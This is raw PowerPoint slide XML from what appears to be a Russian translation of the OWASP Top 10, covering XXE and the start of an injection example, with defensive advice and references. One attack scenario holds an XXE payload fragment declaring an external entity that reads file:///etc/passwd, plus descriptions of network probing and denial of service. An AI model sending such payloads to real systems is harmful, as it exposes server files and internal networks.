            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xml</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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="1.0" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="ISO-8859-1"?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0" smtClean="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&lt;!DOCTYPE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&lt;!ELEMENT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ANY &gt;</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"file:///etc/passwd" &gt;]&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="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&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xxe</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Злоумышленник исследует внутреннюю сеть сервера, заменяя вышеуказанную строку ENTITY на:</a:t>
            </a:r>
          </a:p>
          <a:p>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Злоумышленник пытается вызвать отказ в обслуживании, используя потенциально бесконечный файл:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   &lt;!ENTITY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ct val="90000"/>
              </a:lnSpc>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Приложения, в особенности веб-службы или компоненты на основе XML, являются уязвимыми в следующих случаях:</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принимает XML напрямую или через выгрузку, особенно от </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>недоверенных</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> источников, или включает непроверенные данные в XML-документы, которые затем обрабатываются XML-обработчиком;</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хотя бы один из XML-обработчиков приложения или веб-службы на основе SOAP использует </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>определение типа документов (DTD)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Поскольку механизм отключения DTD зависит от обработчика, рекомендуется воспользоваться справочной информацией, например, "Памяткой OWASP по предотвращению XXE"; </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SAML для идентификации в рамках федеративной безопасности или технологии единого входа (SSO). SAML использует XML для подтверждения идентификаторов, поэтому может быть уязвим;</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SOAP версии ниже 1.2. Оно может быть уязвимо для XXE-атак, если XML-сущности передаются </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>фреймворку</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SOAP;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>если приложение уязвимо для XXE-атак, то злоумышленник может также вызвать отказ в обслуживании или осуществить атаку с использованием миллиона XML-сущностей (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Billion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Laughs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="770" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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Проверка внедрения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7"/>
              </a:rPr>
              <a:t>OWASP: Уязвимость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8"/>
              </a:rPr>
              <a:t>Памятка OWASP: Предотвращение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9"/>
              </a:rPr>
              <a:t>Памятка OWASP: Безопасность XML</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CWE-611: Некорректное ограничение ссылок на внешние сущности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1"/>
              </a:rPr>
              <a:t>Атака Billion Laughs (с использованием миллиона XML-сущностей)</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Атака на SAML с использованием внешних сущностей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Обнаружение и эксплуатация XXE в SAML-интерфейсах</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endParaRPr lang="ru-RU" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Обучение разработчиков имеет большое значение для выявления и противодействия XXE. Кроме того, для предотвращения XXE необходимо:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>использовать, по возможности, более простые форматы данных, например, JSON, и избегать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>сериализации</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> критичных данных;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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установить исправления или обновления для всех библиотек и обработчиков XML, используемых </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>приложением или ОС. Использовать проверки зависимостей. Обновить SOAP до версии 1.2 или выше;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>отключить обработку внешних сущностей XML и DTD во всех XML-обработчиках приложения, согласно </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>"Памятке OWASP по предотвращению XXE"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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реализовать на сервере (по белым спискам) проверку, фильтрацию или очистку (экранирование) входных данных для предотвращения попадания вредоносных данных в XML-документы, заголовки или узлы;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>удостовериться, что функция загрузки XML или XSL проверяет входящие файлы с использованием XSD или другой подобной методики;</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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>анализировать код масштабных и сложных приложений со множеством встраиваемых компонентов вручную, хотя инструменты </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> могут помочь обнаружить XXE в исходном коде.</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Если выполнение данных требований не возможно, попробуйте использовать виртуальные </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>патчи</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, шлюзы безопасности API или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>файрволы</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> веб-приложений (WAF) для обнаружения, мониторинга и блокировки XXE-атак. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="143510" indent="-143510">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="77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A4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Внешние сущности XML (XXE</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1177724557"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="2210771"/>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sz="700" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Злоумышленники могут эксплуатировать уязвимые обработчики XML через загрузку XML или внедрение вредоносного контента в XML-документы, используя уязвимый код, зависимости или компоненты.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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="700" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>По умолчанию, большинство старых обработчиков XML позволяют задавать внешние сущности, URI, которые разыменовываются и вычисляются при обработке XML.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="700" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Инструменты </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="700" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>SAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="700" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> позволяют обнаружить уязвимость путем проверки зависимостей и конфигурации. Инструменты </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="700" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>DAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="700" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> требуют дополнительных операций, выполняемых вручную, для обнаружения и эксплуатации уязвимости. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="700" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Тестировщиков</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="700" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, выполняющих проверки вручную, необходимо обучать XXE-тестированию, поскольку подобные проверки обычно (по состоянию на 2017 г.) не проводятся.</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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="700" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Подобные уязвимости могут использоваться для получения данных, выполнения удаленных запросов с сервера, сканирования внутренней системы, провоцирования отказа в обслуживании, а также осуществления других атак.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="7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всех уязвимых приложений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19140"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61610"/>
            <a:ext cx="628650" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3101250" y="1061610"/>
            <a:ext cx="723900" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId19"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5499230" y="1166385"/>
            <a:ext cx="628650" cy="190500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5851260" y="1514540"/>
            <a:ext cx="990600" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId21"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="28485" y="1514539"/>
            <a:ext cx="990600" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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№1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Приложение использует непроверенные данные в SQL-вызове, который обращается к информации об учетной записи:</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pstmt.setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>acct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"));</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ResultSet</a:t>
            </a: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a:t>
